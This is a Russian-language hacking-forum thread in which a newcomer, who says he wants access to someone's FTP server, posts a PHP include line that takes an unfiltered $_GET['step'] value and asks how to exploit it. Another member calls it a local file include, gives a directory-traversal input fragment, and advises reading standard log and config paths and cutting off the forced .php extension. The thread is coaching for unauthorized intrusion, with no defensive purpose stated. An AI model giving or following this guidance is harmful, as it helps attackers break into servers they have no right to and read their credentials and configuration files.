нашел инклуд для атаки не знаю что дальше делать подскажите — HackZona.Ru

Здравствуйте уважаемые. Буквально только вчера озадачился получить доступ к ftp серверу. Ну очень нужен мне этот двиг. А опыта нету. googl кричит инклуды надо искать и шелл заливать. Вот инклуд вроде нашел только что дальше делать. Инклуд такой: [CODE]include («step_{$_GET['step']}.php»);[/CODE]

нашел инклуд для атаки не знаю что дальше делать подскажите

Сообщений в теме: 11
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
Здравствуйте уважаемые. Буквально только вчера озадачился получить доступ к ftp серверу. Ну очень нужен мне этот двиг. А опыта нету. googl кричит инклуды надо искать и шелл заливать. Вот инклуд вроде нашел только что дальше делать. Инклуд такой:

[CODE]include («step_{$_GET['step']}.php»);[/CODE]
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
инклудить?)
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=DrAssault;143915]инклудить?)[/QUOTE]

я понимаю но как? Ошибку выдает так как в переди step_ и в конце .php стоит. Как в таком случае инклудить? Подскажите
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
да обычный локал инклуд, почитай про это lolo/../../../sgfj
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=DrAssault;143917]да обычный локал инклуд, почитай про это lolo/../../../sgfj[/QUOTE]

а что инклудить то логи найти не могу, пароли тоже, картинки ни чего не отображают.
Нравится
Не нравится
Репутация: 0
Рейтинг: 0
Кол-во тем: 0
Сообщения: 0
[QUOTE=DrAssault;143921]ну а я тебе что?))) есть стандартные пути к логам и конфигам — ищи там и не забывай про добавляющееся расширение .php прибавляющееся в конец файла его отсеч не помешало бы когда логи читать соберёшься)[/QUOTE]